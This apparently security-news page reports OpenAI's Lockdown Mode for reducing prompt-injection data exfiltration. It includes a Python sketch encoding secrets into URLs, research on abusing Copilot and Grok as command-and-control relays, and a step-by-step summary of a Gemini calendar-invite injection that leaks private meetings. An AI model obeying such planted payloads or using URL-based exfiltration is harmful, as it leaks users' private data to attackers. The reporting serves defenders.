Mallory

OpenAI Adds ChatGPT Lockdown Mode and Elevated Risk Labels to Reduce Prompt-Injection Exfiltration

prompt injection, chatgpt enterprise, lockdown mode, chatgpt atlas, chatgpt edu, data exfiltration, privacy concerns, elevated risk, role-based access, ai assistants, tool access, microsoft copilot, browsing restrictions
Updated February 17, 2026 at 08:02 PM · 2 sources


OpenAI introduced Lockdown Mode and Elevated Risk labels in ChatGPT to reduce exposure to prompt injection and related data-exfiltration risks when AI features interact with external systems. Lockdown Mode is positioned as an optional, advanced setting for higher-risk users and environments (notably ChatGPT Enterprise, Edu, for Healthcare, and for Teachers) that restricts tool access and limits how ChatGPT can reach outside systems. Reported controls include disabling or constraining capabilities attackers could abuse via conversations or connected apps, and limiting browsing so that no live network requests leave OpenAI-controlled infrastructure (browsing is constrained to cached content). Admins can enable the setting via workspace controls and apply additional restrictions through dedicated roles. Elevated Risk labels complement this with in-product warnings and guidance for features that increase risk when connecting to apps or the web, across ChatGPT, ChatGPT Atlas, and Codex.
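Conceptually, a lockdown setting like this acts as a default-deny policy gate in front of tool invocations. The sketch below is purely illustrative and assumes hypothetical names (`ToolCall`, `LOCKDOWN_POLICY`, `allowed_under_lockdown`); it is not OpenAI's implementation or API, only a minimal model of the reported behavior: connectors disabled, browsing restricted to cached content, unknown tools refused.

```python
# Hypothetical sketch of a Lockdown-Mode-style policy gate.
# All names here are illustrative assumptions, not OpenAI's API.
from dataclasses import dataclass


@dataclass
class ToolCall:
    tool: str          # e.g. "browse", "connector"
    target: str        # URL or connected-app identifier
    cached_only: bool  # whether the request can be served from cache

# Per-tool rules mirroring the reported restrictions:
# no connected apps, and no live network requests for browsing.
LOCKDOWN_POLICY = {
    "browse": "cached_only",
    "connector": "deny",
}


def allowed_under_lockdown(call: ToolCall) -> bool:
    rule = LOCKDOWN_POLICY.get(call.tool, "deny")  # default-deny unknown tools
    if rule == "deny":
        return False
    if rule == "cached_only":
        return call.cached_only  # live fetches are refused
    return True
```

The key design choice in any such gate is the default-deny fallback: a tool the policy has never heard of is refused rather than allowed, so new capabilities do not silently widen the attack surface.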

Separate research highlighted how AI assistants with web-browsing/URL-fetching features can be abused as stealthy command-and-control (C2) relays, demonstrating a technique against Microsoft Copilot and xAI Grok that tunnels operator commands and victim data through legitimate AI web interfaces and can work without an API key or registered account. In parallel, the European Parliament reportedly disabled built-in AI tools on lawmakers’ work devices due to cybersecurity and privacy concerns about uploading sensitive correspondence to third-party cloud AI providers and uncertainty about what data is shared and retained. Other referenced material focused on general productivity customization of ChatGPT via “Custom Instructions,” rather than a specific security event or disclosure.
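To make the relay risk concrete: any feature that fetches attacker-supplied URLs can double as an outbound channel, because data can be encoded into the URL itself and recovered by whoever operates the destination server. The sketch below is not the disclosed tooling; it is a generic illustration (hypothetical function names) of the underlying encode/decode step that makes URL fetching usable for exfiltration.

```python
# Generic illustration of URL-based exfiltration, the primitive behind
# abusing AI web-fetch features as covert channels. Hypothetical names.
import base64
from urllib.parse import parse_qs, urlparse


def encode_exfil_url(attacker_host: str, secret: str) -> str:
    # The secret travels as an innocuous-looking query parameter.
    token = base64.urlsafe_b64encode(secret.encode()).decode().rstrip("=")
    return f"https://{attacker_host}/beacon?d={token}"


def decode_exfil_url(url: str) -> str:
    # Server side: recover the payload from the URL the assistant fetched.
    token = parse_qs(urlparse(url).query)["d"][0]
    padding = "=" * (-len(token) % 4)  # restore stripped base64 padding
    return base64.urlsafe_b64decode(token + padding).decode()
```

This is why mitigations such as Lockdown Mode's cached-only browsing matter: if no live request ever reaches the attacker's server, the channel is cut regardless of how the payload is encoded.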

Related Entities

Organizations

Affected Products

Related Stories

AI Chatbot Security Risks: Prompt Injection, Data Exfiltration, and Privacy Trade-offs in New Consumer Tiers

Researchers disclosed an **indirect prompt injection** technique against **Google Gemini** that used a malicious **Google Calendar invite** to bypass guardrails and exfiltrate private meeting details. By embedding a hidden natural-language payload in an event description, an attacker could cause Gemini—when later asked an innocuous scheduling question—to summarize a user’s private meetings and write that summary into a newly created calendar event; in many enterprise configurations, that new event could be visible to the attacker, enabling data theft without additional user interaction. The issue was reported as remediated after responsible disclosure, underscoring how AI assistants integrated with enterprise SaaS can create new cross-application data-extraction paths.

Separately, OpenAI product rollouts raised enterprise data-handling concerns tied to consumer usage. **ChatGPT Go** (a low-cost tier) was described as introducing an **ad-supported** model that could increase exposure of conversation data and usage patterns to advertising ecosystems, amplifying “shadow AI” risk when employees use personal accounts for work. **ChatGPT Health** was positioned as a dedicated health experience with added protections (e.g., encryption/isolation and claims that user data is not used to train foundation models), but reporting highlighted unresolved questions around safety, privacy, and how sensitive health information is protected in practice—areas that may require additional governance and controls if employees adopt these tools outside approved enterprise channels.

1 month ago

AI Prompt Injection and Data Leakage Vulnerabilities in OpenAI's ChatGPT and Atlas Browser

Tenable Research has identified seven novel vulnerabilities and attack techniques in OpenAI's ChatGPT, including indirect prompt injections, exfiltration of user data, and bypasses of safety mechanisms in the latest GPT-5 model. These vulnerabilities allow attackers to manipulate the large language model (LLM) through crafted inputs, potentially leading to the theft of private information from user memories and chat histories, even when users simply interact with ChatGPT. The research highlights that hundreds of millions of users could be at risk, as attackers can exploit these weaknesses to bypass safeguards and extract sensitive data without user awareness. The release of OpenAI's ChatGPT Atlas, an AI-powered browser that remembers user activities and acts autonomously, further amplifies these concerns. Security experts warn that features such as persistent memory and autonomous actions increase the attack surface, making the browser susceptible to prompt injection and other AI-specific vulnerabilities. The implications for enterprise security and privacy are significant, as these AI-driven tools become more integrated into business processes, necessitating new approaches to identity management, access controls, and oversight to mitigate the risks posed by advanced AI-enabled attacks.

4 months ago
AI Feature Rollouts and Data-Handling Risks in Consumer and Developer Tools

Mozilla said an upcoming *Firefox* release will add centralized controls to disable generative-AI capabilities, including a single **“Block AI enhancements”** toggle intended to prevent current and future AI features (and related prompts) from being enabled in the desktop browser. The controls are expected to allow per-feature management of AI functions such as translations, PDF image alt-text generation, AI-assisted tab grouping, link previews, and sidebar chatbot access. Separately, OpenAI announced product changes around its developer and ChatGPT ecosystems, including a Mac-only *Codex* app positioned as a multi-agent “command center” with sandboxing intended to limit file writes and network access, and plans to retire **GPT-4o** and several other ChatGPT models as usage shifts to **GPT-5.2**. In parallel, a security warning highlighted a report alleging two widely used AI coding assistants were **exfiltrating all ingested code to China**, underscoring the need for enterprise controls over AI developer tools, data residency, and code/IP handling.

1 month ago

Get Ahead of Threats Like This

Mallory continuously monitors global threat intelligence and correlates it with your attack surface. Know if you're exposed — before adversaries strike.